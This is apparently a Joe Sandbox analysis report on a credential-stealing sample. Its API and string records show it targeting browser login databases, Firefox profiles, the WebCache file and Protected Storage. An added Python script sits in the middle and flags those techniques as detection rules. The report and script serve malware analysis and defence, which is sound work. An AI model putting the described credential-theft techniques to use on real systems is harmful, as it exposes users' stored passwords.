• Snapshot File: hcaresult_14_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: memcpy
• String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
• API String ID: 3510742995-2641926074
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00402778: free.MSVCRT(00000000,0040E508,?,?,?,?,?,/deleteregkey,/savelangfile,?,?), ref: 0040277F
  • Part of subcall function 00410168: memset.MSVCRT ref: 004101DA
  • Part of subcall function 00410168: wcsrchr.MSVCRT ref: 004101F2
  • Part of subcall function 00410168: memset.MSVCRT ref: 004102D9
  • Part of subcall function 0040FF51: SetCurrentDirectoryW.KERNEL32(?,?,?,00403292,?), ref: 0040FF9E
• memset.MSVCRT ref: 0040330A
• memcpy.MSVCRT ref: 0040331C
• wcscmp.MSVCRT ref: 00403348
• _wcsicmp.MSVCRT ref: 00403385
Strings
Memory Dump Source
• Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: memset$CurrentDirectory_wcsicmpfreememcpywcscmpwcsrchr
• String ID: $J/@
• API String ID: 1763786148-830378395
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0040F026: memset.MSVCRT ref: 0040F042
  • Part of subcall function 0040F026: memset.MSVCRT ref: 0040F057
  • Part of subcall function 0040F026: wcscat.MSVCRT ref: 0040F080
  • Part of subcall function 0040F026: wcscat.MSVCRT ref: 0040F0A9
• memset.MSVCRT ref: 0040EE42
• wcslen.MSVCRT ref: 0040EE59
• wcslen.MSVCRT ref: 0040EE61
• wcslen.MSVCRT ref: 0040EEBC
• wcslen.MSVCRT ref: 0040EECA
  • Part of subcall function 004076A9: wcscpy.MSVCRT ref: 004076B1
  • Part of subcall function 004076A9: wcscat.MSVCRT ref: 004076C0
Strings
Memory Dump Source
• Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: wcslen$memsetwcscat$wcscpy
• String ID: history.dat$places.sqlite
• API String ID: 2541527827-467022611
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: wcslen$memsetwcscatwcscpy
• String ID: Login Data$Web Data
• API String ID: 3932597654-4228647177
                                                                                                                                                    • Opcode ID: 350975586496b093848a9f674fd33517dd62bead458e0c7f943732b3c3b83fa5
                                                                                                                                                    • Instruction ID: 391ffb8f75831278f4964df5f57522d74f6eb7522eeef9a3bb7e860aca09f0fd
                                                                                                                                                    • Opcode Fuzzy Hash: 350975586496b093848a9f674fd33517dd62bead458e0c7f943732b3c3b83fa5
                                                                                                                                                    • Instruction Fuzzy Hash: 3621B83294411C7BDB10AB55DC89ACA73ACAF10368F10487BF418E6181EBF9AEC48A5C
Uniqueness

Uniqueness Score: -1.00%

APIs
• CreateFileW.KERNELBASE(?,-7FBEAA6E,00000003,00000000,?,?,00000000), ref: 00415C86
• CreateFileA.KERNEL32(?,-7FBEAA6E,00000003,00000000,00415512,00415512,00000000), ref: 00415C9E
• GetLastError.KERNEL32 ref: 00415CAD
• free.MSVCRT(?), ref: 00415CBA
Similarity
• API ID: CreateFile$ErrorLastfree
• String ID:

APIs
• memset.MSVCRT ref: 0040F042
• memset.MSVCRT ref: 0040F057
  • Part of subcall function 00412270: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001A,00000000), ref: 004122AA
  • Part of subcall function 0040719A: wcslen.MSVCRT ref: 0040719B
  • Part of subcall function 0040719A: wcscat.MSVCRT ref: 004071B3
• wcscat.MSVCRT ref: 0040F080
  • Part of subcall function 00412270: memset.MSVCRT ref: 004122C9
  • Part of subcall function 00412270: RegCloseKey.ADVAPI32(?), ref: 00412330
  • Part of subcall function 00412270: wcscpy.MSVCRT ref: 0041233E
• wcscat.MSVCRT ref: 0040F0A9
Strings
Similarity
• API ID: memsetwcscat$CloseFolderPathSpecialwcscpywcslen
• String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles

APIs
  • Part of subcall function 004121C3: LoadLibraryW.KERNEL32(shell32.dll,0040E314,00000000,?,00000002), ref: 004121D1
  • Part of subcall function 004121C3: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 004121E6
• SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001A,00000000), ref: 004122AA
• memset.MSVCRT ref: 004122C9
• RegCloseKey.ADVAPI32(?), ref: 00412330
• wcscpy.MSVCRT ref: 0041233E
  • Part of subcall function 00407674: GetVersionExW.KERNEL32(00450DA8,0000001A,00412291), ref: 0040768E
Strings
• Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 004122E4, 004122F4
Similarity
• API ID: AddressCloseFolderLibraryLoadPathProcSpecialVersionmemsetwcscpy
• String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders

APIs
• wcschr.MSVCRT ref: 00411A2D
• _snwprintf.MSVCRT ref: 00411A52
• WritePrivateProfileStringW.KERNEL32(?,?,?,004495A0), ref: 00411A70
• GetPrivateProfileStringW.KERNEL32 ref: 00411A88
Strings
Similarity
• API ID: PrivateProfileString$Write_snwprintfwcschr
• String ID: "%s"

APIs
• GetModuleHandleW.KERNEL32(kernel32.dll,?,004112EE,?,?,?,?,?,00000000,?), ref: 00411151
• GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 0041116B
• GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,004112EE,?,?,?,?,?,00000000,?), ref: 0041118E
Strings
Similarity
• API ID: AddressHandleModuleProcProcessTimes
• String ID: GetProcessTimes$kernel32.dll

APIs
Strings
Similarity
• API ID: memcmp
• String ID: @ $SQLite format 3

APIs
• ??2@YAPAXI@Z.MSVCRT ref: 0040E0CE
• ??2@YAPAXI@Z.MSVCRT ref: 0040E0F7
• DeleteObject.GDI32(?), ref: 0040E129
• GetModuleHandleW.KERNEL32(00000000,00000000,?,?,00000000,0040E36A), ref: 0040E171
• LoadIconW.USER32(00000000,00000065), ref: 0040E17A
Similarity
• API ID: ??2@$DeleteHandleIconLoadModuleObject
• String ID:

APIs
  • Part of subcall function 00408B10: OpenProcess.KERNEL32(00000040,00000000,?,00000104,00000000,?,00000104,00000000,00000000,00000104,Microsoft\Windows\WebCache\WebCacheV01.dat), ref: 00408B85
  • Part of subcall function 00408B10: GetCurrentProcess.KERNEL32(00000000,80000000,00000000,00000000), ref: 00408BA4
  • Part of subcall function 00408B10: DuplicateHandle.KERNELBASE(00000000,00000104,00000000), ref: 00408BB1
  • Part of subcall function 00408B10: GetFileSize.KERNEL32(00000000,00000000), ref: 00408BC6
  • Part of subcall function 00408B10: CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000), ref: 00408BF0
  • Part of subcall function 00408B10: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 00408C05
  • Part of subcall function 00408B10: WriteFile.KERNELBASE(?,00000000,00000104,004091EB,00000000), ref: 00408C20
  • Part of subcall function 00408B10: UnmapViewOfFile.KERNEL32(00000000), ref: 00408C27
  • Part of subcall function 00408B10: FindCloseChangeNotification.KERNELBASE(?), ref: 00408C30
• FindCloseChangeNotification.KERNELBASE(000000FF,000000FF,00000000,?,004091EB,000000FF,00000000,00000104,Microsoft\Windows\WebCache\WebCacheV01.dat), ref: 00409074
  • Part of subcall function 00408D9D: memset.MSVCRT ref: 00408E72
                                                                                                                                                      • Part of subcall function 00408D9D: wcschr.MSVCRT ref: 00408EAA
                                                                                                                                                      • Part of subcall function 00408D9D: memcpy.MSVCRT ref: 00408EDE
                                                                                                                                                    • DeleteFileW.KERNELBASE(?,?,004091EB,000000FF,00000000,00000104,Microsoft\Windows\WebCache\WebCacheV01.dat), ref: 00409095
                                                                                                                                                    • CloseHandle.KERNEL32(000000FF,?,004091EB,000000FF,00000000,00000104,Microsoft\Windows\WebCache\WebCacheV01.dat), ref: 004090BC
                                                                                                                                                      • Part of subcall function 00408C67: memset.MSVCRT ref: 00408CAF
                                                                                                                                                      • Part of subcall function 00408C67: _snwprintf.MSVCRT ref: 00408D49
                                                                                                                                                      • Part of subcall function 00408C67: free.MSVCRT(000000FF,?,000000FF,00000000,00000104,7519F560), ref: 00408D7D
                                                                                                                                                    Strings
                                                                                                                                                    • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 00408FB4
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: File$Close$ChangeFindHandleNotificationProcessViewmemset$CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintffreememcpywcschr
                                                                                                                                                    • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat
                                                                                                                                                    • API String ID: 3931293568-1514811420
                                                                                                                                                    • Opcode ID: 296897d7b9fc56a1ed802aa42710325314df0d67c48e9c21b811ee4e31976f5b
                                                                                                                                                    • Instruction ID: f61eabc5127fffa0127996e1b9e76e3c42d0daca9916cdcd83e0194a9dfe4be1
                                                                                                                                                    • Opcode Fuzzy Hash: 296897d7b9fc56a1ed802aa42710325314df0d67c48e9c21b811ee4e31976f5b
                                                                                                                                                    • Instruction Fuzzy Hash: 10314CB1C006289BCF60DFA5CD855CEFBB8AF40315F1002ABA518B31A2DB756E85CF59
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _wcsicmpqsort
                                                                                                                                                    • String ID: /nosort$/sort
                                                                                                                                                    • API String ID: 1579243037-1578091866
                                                                                                                                                    • Opcode ID: b8bcc0ce675c29f22b0227198f2ab65a41989cf9845e13ce1ccf23b6e43e1f16
                                                                                                                                                    • Instruction ID: 426287280b2395c37d482f654794667c251e21b6a2c3e86ec69022cc6db77350
                                                                                                                                                    • Opcode Fuzzy Hash: b8bcc0ce675c29f22b0227198f2ab65a41989cf9845e13ce1ccf23b6e43e1f16
                                                                                                                                                    • Instruction Fuzzy Hash: 4821F8317006019FD714AB75C981E55B3A9FF95318F01053EF519A72D2CB7ABC11CB9A
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 004117E3: FreeLibrary.KERNELBASE(?,00409EC4,00000000,004101A5,?,?,?,?,?,0040328B,?), ref: 004117EF
                                                                                                                                                    • LoadLibraryW.KERNELBASE(pstorec.dll,00000000,004101A5,?,?,?,?,?,0040328B,?), ref: 00409EC9
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 00409EDC
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Library$AddressFreeLoadProc
                                                                                                                                                    • String ID: PStoreCreateInstance$pstorec.dll
                                                                                                                                                    • API String ID: 145871493-2881415372
                                                                                                                                                    • Opcode ID: 0c221e4a7068c4d6934d41343829b8b78c46c2a8619205bb2734fd8b0e3e91f3
                                                                                                                                                    • Instruction ID: b7b877f0cca51cf4ed89ca0d343beedc6eb81d3109fbfde12955c258fb57ec89
                                                                                                                                                    • Opcode Fuzzy Hash: 0c221e4a7068c4d6934d41343829b8b78c46c2a8619205bb2734fd8b0e3e91f3
                                                                                                                                                    • Instruction Fuzzy Hash: 4DF0E2713047035BE7206BB99C45B9776E85F40715F10842EB126D16E2DBBCD9808BA9
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%
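The two function records above are the most telling ones in this dump: the subcall at 00408B10 opens another process, duplicates a handle out of it, maps the object and writes it out (OpenProcess, DuplicateHandle, CreateFileMappingW, MapViewOfFile, WriteFile), with the string `Microsoft\Windows\WebCache\WebCacheV01.dat` as its target; this is the usual way of copying the Edge/IE WebCache database while another process holds it locked. The record at 00409EC9 loads `pstorec.dll` and resolves `PStoreCreateInstance`, the legacy Protected Storage API used to read saved mail and Internet Explorer credentials. The following script is an added example, not code from the report or from the sample: it parses "APIs" bullets in the format Joe Sandbox uses on this page and flags those two patterns. The rule names are this example's own, and the sample listing embedded in it is copied from the bullets above. One caveat when reading the calls: `FindCloseChangeNotification.KERNELBASE` at 00408C30 and 00409074 is almost certainly the symbolizer's name for the same KERNELBASE code that `CloseHandle` resolves to, so those calls just close handles.

```python
"""
Parse the per-function "APIs" bullets of a Joe Sandbox report and flag the
credential-theft patterns visible in this one. Added example; not code from
the report or the sample. Rule names and the "<direct>" group label are ours.
"""
import re
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List, Optional, Set, Tuple

# Three shapes of bullet occur on the page:
#   • Part of subcall function 00408B10: OpenProcess.KERNEL32(00000040,...), ref: 00408B85
#   • LoadLibraryW.KERNELBASE(pstorec.dll,00000000,...), ref: 00409EC9
#   • Part of subcall function 00408D9D: memset.MSVCRT ref: 00408E72     (no argument list)
_CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>[A-Za-z0-9_?@]+)\.(?P<mod>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)


@dataclass(frozen=True)
class Call:
    api: str
    module: str
    args: Tuple[str, ...]
    ref: str                    # address of the call instruction
    subcall_of: Optional[str]   # callee function when reported as "Part of subcall"


def parse_calls(listing: str) -> List[Call]:
    """Extract Call records; lines that are not API bullets are ignored."""
    calls: List[Call] = []
    for line in listing.splitlines():
        m = _CALL_RE.match(line)
        if not m:
            continue
        raw = m.group("args") or ""
        args = tuple(a.strip() for a in raw.split(",")) if raw else ()
        calls.append(Call(m.group("api"), m.group("mod"), args, m.group("ref"), m.group("sub")))
    return calls


# Rule 1: copy a file another process holds open by stealing its handle:
# OpenProcess on the owner -> DuplicateHandle -> map the object -> write it out.
_LOCKED_FILE_COPY = {"OpenProcess", "DuplicateHandle", "CreateFileMappingW", "MapViewOfFile"}


def find_indicators(calls: List[Call]) -> Set[Tuple[str, str]]:
    """Return (function, indicator) pairs; "<direct>" groups calls not inside a reported subcall."""
    by_func: Dict[str, List[Call]] = defaultdict(list)
    for c in calls:
        by_func[c.subcall_of or "<direct>"].append(c)

    hits: Set[Tuple[str, str]] = set()
    for func, group in by_func.items():
        apis = {c.api for c in group}
        if _LOCKED_FILE_COPY <= apis:
            hits.add((func, "locked-file copy via duplicated handle"))
        # Rule 2: the WebCache database path shows up as a call argument.
        if any("WebCacheV01.dat" in a for c in group for a in c.args):
            hits.add((func, "touches WebCacheV01.dat"))
        # Rule 3: dynamic resolution of pstorec.dll!PStoreCreateInstance (Protected Storage).
        loads_pstorec = any(c.api.startswith("LoadLibrary")
                            and any(a.lower() == "pstorec.dll" for a in c.args) for c in group)
        resolves_pstore = any(c.api == "GetProcAddress" and "PStoreCreateInstance" in c.args
                              for c in group)
        if loads_pstorec and resolves_pstore:
            hits.add((func, "resolves pstorec.dll!PStoreCreateInstance"))
    return hits


# Constructed input: bullets copied from the 00408B10 and pstorec.dll records in this report.
SAMPLE_LISTING = r"""
• Part of subcall function 00408B10: OpenProcess.KERNEL32(00000040,00000000,?,00000104,00000000,?,00000104,00000000,00000000,00000104,Microsoft\Windows\WebCache\WebCacheV01.dat), ref: 00408B85
• Part of subcall function 00408B10: GetCurrentProcess.KERNEL32(00000000,80000000,00000000,00000000), ref: 00408BA4
• Part of subcall function 00408B10: DuplicateHandle.KERNELBASE(00000000,00000104,00000000), ref: 00408BB1
• Part of subcall function 00408B10: GetFileSize.KERNEL32(00000000,00000000), ref: 00408BC6
• Part of subcall function 00408B10: CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000), ref: 00408BF0
• Part of subcall function 00408B10: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 00408C05
• Part of subcall function 00408B10: WriteFile.KERNELBASE(?,00000000,00000104,004091EB,00000000), ref: 00408C20
• Part of subcall function 00408B10: UnmapViewOfFile.KERNEL32(00000000), ref: 00408C27
• Part of subcall function 00408B10: FindCloseChangeNotification.KERNELBASE(?), ref: 00408C30
• FindCloseChangeNotification.KERNELBASE(000000FF,000000FF,00000000,?,004091EB,000000FF,00000000,00000104,Microsoft\Windows\WebCache\WebCacheV01.dat), ref: 00409074
• Part of subcall function 00408D9D: memset.MSVCRT ref: 00408E72
• DeleteFileW.KERNELBASE(?,?,004091EB,000000FF,00000000,00000104,Microsoft\Windows\WebCache\WebCacheV01.dat), ref: 00409095
• CloseHandle.KERNEL32(000000FF,?,004091EB,000000FF,00000000,00000104,Microsoft\Windows\WebCache\WebCacheV01.dat), ref: 004090BC
• LoadLibraryW.KERNELBASE(pstorec.dll,00000000,004101A5,?,?,?,?,?,0040328B,?), ref: 00409EC9
• GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 00409EDC
"""

if __name__ == "__main__":
    for func, what in sorted(find_indicators(parse_calls(SAMPLE_LISTING))):
        print(f"{func}: {what}")
```

Run against the embedded listing it reports the handle-duplication copy inside 00408B10, the WebCache path in both 00408B10 and the direct calls, and the Protected Storage resolution among the direct calls. The grouping is by the report's own "Part of subcall function" attribution, so calls the report lists without that prefix land in one "<direct>" bucket; when feeding a whole report rather than one record, split the text per function first, or the direct bucket will merge unrelated functions.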

                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ??3@
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 613200358-0
                                                                                                                                                    • Opcode ID: 91284e8d292f34cc8389785a3eba88276cdd8f2cca5db5bcb264024c119ed55e
                                                                                                                                                    • Instruction ID: 4d75bcbf83e2a718e0a773ad5cf6a383805f84e699810b963ae7674306c23c36
                                                                                                                                                    • Opcode Fuzzy Hash: 91284e8d292f34cc8389785a3eba88276cdd8f2cca5db5bcb264024c119ed55e
                                                                                                                                                    • Instruction Fuzzy Hash: 05E080A1705301777A105B36BE55B0313EC3A703423D8041FF40AC3255DEBCC840441C
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    • only a single result allowed for a SELECT that is part of an expression, xrefs: 004380DE
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: memset
                                                                                                                                                    • String ID: only a single result allowed for a SELECT that is part of an expression
                                                                                                                                                    • API String ID: 2221118986-1725073988
                                                                                                                                                    • Opcode ID: fea911689c87fcb8dadeea6a797f322e67ae447bf2e03149324d6587d0a0c1b4
                                                                                                                                                    • Instruction ID: 9afff8ac9fdfbc15a9c7ae9a6e2295b57ef319e934304d2411a679509b53bb08
                                                                                                                                                    • Opcode Fuzzy Hash: fea911689c87fcb8dadeea6a797f322e67ae447bf2e03149324d6587d0a0c1b4
                                                                                                                                                    • Instruction Fuzzy Hash: 36826971A00318AFDF25DF69C881AAEBBA1EF08318F14511EFD1597292DB79E841CB94
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ??2@
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1033339047-0
                                                                                                                                                    • Opcode ID: 0567f08961b2cf397e8b5cffb80cfb7da57dcf973421e34affee400c22969a13
                                                                                                                                                    • Instruction ID: 97910a1e78d05b4995072b8892bf30812772bdb2f497aa37043254e3fee4362a
                                                                                                                                                    • Opcode Fuzzy Hash: 0567f08961b2cf397e8b5cffb80cfb7da57dcf973421e34affee400c22969a13
                                                                                                                                                    • Instruction Fuzzy Hash: AB01DEB16523406FEB58DB39EE67B2A66949B58351F48453EF207C91F6EAB4C840CA08
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: memset
                                                                                                                                                    • String ID: 5lA$BINARY
                                                                                                                                                    • API String ID: 2221118986-2383938406
                                                                                                                                                    • Opcode ID: 5c1320cbab28b8c6fe770ef48558482079ba1b310d7c10d9b0a426fab7bf5df3
                                                                                                                                                    • Instruction ID: bfb3245fc00688105b1f81726e77846e409aff0e69a2cb21cfce066b793b8303
                                                                                                                                                    • Opcode Fuzzy Hash: 5c1320cbab28b8c6fe770ef48558482079ba1b310d7c10d9b0a426fab7bf5df3
                                                                                                                                                    • Instruction Fuzzy Hash: 52519C719443459FDB21DF68C8C1AEA7BE4AF08351F14446FE859CB381D778D980CBA9
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: memset
                                                                                                                                                    • String ID: 5lA
                                                                                                                                                    • API String ID: 2221118986-359836612
                                                                                                                                                    • Opcode ID: 10b18d0b29360d5b332a86cd44162c1c7f48b8235d874daa35843e8e1b90a446
                                                                                                                                                    • Instruction ID: 4fa61a6d7a1dab5f23492278920678b1bd769144bcf213aa264db06e5f0c3c50
                                                                                                                                                    • Opcode Fuzzy Hash: 10b18d0b29360d5b332a86cd44162c1c7f48b8235d874daa35843e8e1b90a446
                                                                                                                                                    • Instruction Fuzzy Hash: 2A417AB2500601EFCB30DF64E9848AAB7F6FB08354712892FE54AC7650E738E9C5CB58
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00414D9F: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00414DC0
  • Part of subcall function 00414D9F: GetLastError.KERNEL32 ref: 00414DD1
  • Part of subcall function 00414D9F: GetLastError.KERNEL32 ref: 00414DD7
• ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 00414E4C
• GetLastError.KERNEL32 ref: 00414E56
Memory Dump Source
• Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: ErrorLast$File$PointerRead
• String ID:
• API String ID: 839530781-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00414DC0
• GetLastError.KERNEL32 ref: 00414DD1
• GetLastError.KERNEL32 ref: 00414DD7
Memory Dump Source
• Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: ErrorLast$FilePointer
• String ID:
• API String ID: 1156039329-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetTempPathW.KERNEL32(00000104,?), ref: 004074DD
• GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004074EF
• GetTempFileNameW.KERNELBASE(?,00000000,00000000,?), ref: 00407506
Memory Dump Source
• Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: Temp$DirectoryFileNamePathWindows
• String ID:
• API String ID: 1125800050-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• malloc.MSVCRT ref: 00407491
• memcpy.MSVCRT ref: 004074A9
• free.MSVCRT(00000000,00000000,?,00408025,00000002,?,00000000,?,004082EE,00000000,?,00000000), ref: 004074B2
Memory Dump Source
• Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: freemallocmemcpy
• String ID:
• API String ID: 3056473165-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• FreeLibrary.KERNELBASE(?,?,0040FF66,?,?,00403292,?), ref: 0044234D
Strings
Memory Dump Source
• Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: FreeLibrary
• String ID: Lh@
• API String ID: 3664257935-1564020105
Uniqueness

Uniqueness Score: -1.00%

APIs
• ReadFile.KERNELBASE(?,?,5"D,00000000,00000000,?,?,00442235,00000000,00000000), ref: 00407BAA
Strings
Memory Dump Source
• Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: FileRead
• String ID: 5"D
• API String ID: 2738559852-199376320
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID:
• String ID: d
• API String ID: 0-2564639436
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0040B1B3: ??2@YAPAXI@Z.MSVCRT ref: 0040B1D4
  • Part of subcall function 0040B1B3: ??3@YAXPAX@Z.MSVCRT ref: 0040B29B
• GetStdHandle.KERNEL32(000000F5,?,00000000,00000001,?,?,?,0040E2DC,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040C5DC
• FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,0040E2DC,00000000,00000000,?,00000000,00000000,00000000), ref: 0040C6E9
  • Part of subcall function 0040715D: CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0040C5D7,?,?,00000000,00000001,?,?,?,0040E2DC), ref: 0040716F
  • Part of subcall function 004071BD: GetLastError.KERNEL32(00000000,?,0040C6FE,00000000,?,?,?,0040E2DC,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 004071D1
  • Part of subcall function 004071BD: _snwprintf.MSVCRT ref: 004071FE
  • Part of subcall function 004071BD: MessageBoxW.USER32(?,?,Error,00000030), ref: 00407217
Memory Dump Source
• Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
